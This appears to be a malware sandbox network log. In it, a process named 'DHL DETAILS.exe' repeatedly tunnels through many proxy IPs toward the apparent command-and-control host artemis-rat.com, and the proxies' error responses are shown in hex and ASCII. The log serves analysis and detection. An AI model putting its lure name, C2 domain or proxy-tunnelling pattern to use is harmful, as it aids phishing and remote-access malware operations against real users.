                                                                                    Mar 9, 2024 13:14:18.870932102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.380410910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.474400997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1313192.168.2.553800167.71.5.8331286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.405586958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.737647057 CET28INHTTP/1.1 400 Bad Request


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1314192.168.2.553923172.67.250.212806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.406363010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.560884953 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1315192.168.2.5538038.217.143.187156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.407537937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1316192.168.2.553443161.97.170.209588976352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.408366919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.473810911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1317192.168.2.553792120.78.191.225806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.408559084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.744429111 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                                                                                    Mar 9, 2024 13:14:18.746556044 CET295INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 150
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1318192.168.2.55380480.67.8.6806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.421639919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1319192.168.2.55380643.155.142.116156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.421639919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1320192.168.2.55236818.166.142.18010806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.422946930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1321192.168.2.55389738.162.0.22131286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.422962904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.833342075 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Proxy-Authenticate: Basic realm=""
                                                                                    Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                    Data Ascii: Proxy Authentication Required


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1322192.168.2.553777221.194.149.8806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.424464941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.223869085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.534548044 CET713INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.19.10
                                                                                    Date: Sat, 09 Mar 2024 12:14:21 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 560
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 31 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.19.10</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1323192.168.2.55246990.74.184.329996352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.426724911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.473810911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1324192.168.2.55384361.111.38.5806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.426728010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.900345087 CET507INHTTP/1.1 502 Proxy Error
                                                                                    Date: Sat, 09 Mar 2024 12:14:21 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 341
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 32 20 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 72 65 63 65 69 76 65 64 20 61 6e 20 69 6e 76 61 6c 69 64 0d 0a 72 65 73 70 6f 6e 73 65 20 66 72 6f 6d 20 61 6e 20 75 70 73 74 72 65 61 6d 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0d 0a 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 3c 70 3e 52 65 61 73 6f 6e 3a 20 3c 73 74 72 6f 6e 67 3e 45 72 72 6f 72 20 72 65 61 64 69 6e 67 20 66 72 6f 6d 20 72 65 6d 6f 74 65 20 73 65 72 76 65 72 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 70 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>502 Proxy Error</title></head><body><h1>Proxy Error</h1><p>The proxy server received an invalidresponse from an upstream server.<br />The proxy server could not handle the request<p>Reason: <strong>Error reading from remote server</strong></p></p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1325192.168.2.553783216.9.224.113806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.426915884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1326192.168.2.553835121.164.200.1810806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.426918983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.161699057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1327192.168.2.55383746.17.63.16641546352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.427398920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.747642994 CET339INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/4.7
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 5
                                                                                    X-Squid-Error: TCP_RESET 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    X-Cache: MISS from proxy.wakoopa.com
                                                                                    Via: 1.1 proxy.wakoopa.com (squid/4.7)
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 72 65 73 65 74
                                                                                    Data Ascii: reset


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1328192.168.2.55380794.30.152.172806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.430653095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1329192.168.2.55383147.114.101.5788886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.439804077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.777220964 CET334INHTTP/1.1 400 Bad Request
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 204
                                                                                    Connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>tengine</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1330192.168.2.55399345.14.174.180806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.440278053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.594495058 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1331192.168.2.553984162.159.242.109806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.442168951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.603044033 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
